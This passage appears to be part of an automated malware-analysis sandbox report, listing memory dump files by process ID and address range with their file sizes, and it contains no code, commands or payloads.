                                                                                                                                            • memory/2944-665-0x0000000000620000-0x0000000000ADE000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4.7MB

                                                                                                                                            • memory/2980-276-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/3160-656-0x0000000005940000-0x0000000005C94000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              3.3MB

                                                                                                                                            • memory/3344-645-0x0000000010000000-0x00000000105DD000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              5.9MB

                                                                                                                                            • memory/3344-613-0x0000000000D60000-0x00000000013CE000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              6.4MB

                                                                                                                                            • memory/3884-37-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              1.6MB

                                                                                                                                            • memory/3984-569-0x0000000000400000-0x0000000000D1C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              9.1MB

                                                                                                                                            • memory/3984-530-0x0000000000400000-0x0000000000D1C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              9.1MB

                                                                                                                                            • memory/4220-629-0x0000000000400000-0x0000000000D1C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              9.1MB

                                                                                                                                            • memory/4220-650-0x0000000000400000-0x0000000000D1C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              9.1MB

                                                                                                                                            • memory/4268-626-0x0000000000400000-0x000000000079E000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              3.6MB

                                                                                                                                            • memory/4332-439-0x0000000000400000-0x000000000079E000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              3.6MB

                                                                                                                                            • memory/4396-309-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              352KB

                                                                                                                                            • memory/4396-313-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              352KB

                                                                                                                                            • memory/4592-583-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              15.5MB

                                                                                                                                            • memory/4592-579-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              15.5MB

                                                                                                                                            • memory/4592-680-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              15.5MB

                                                                                                                                            • memory/4956-83-0x00000000006E0000-0x00000000006E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4956-81-0x00000000006E0000-0x00000000006E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4964-437-0x0000000000400000-0x000000000078F000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              3.6MB

                                                                                                                                            • memory/4996-82-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              352KB

                                                                                                                                            • memory/4996-85-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              352KB

                                                                                                                                            • memory/5308-681-0x0000000000D60000-0x00000000013CE000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              6.4MB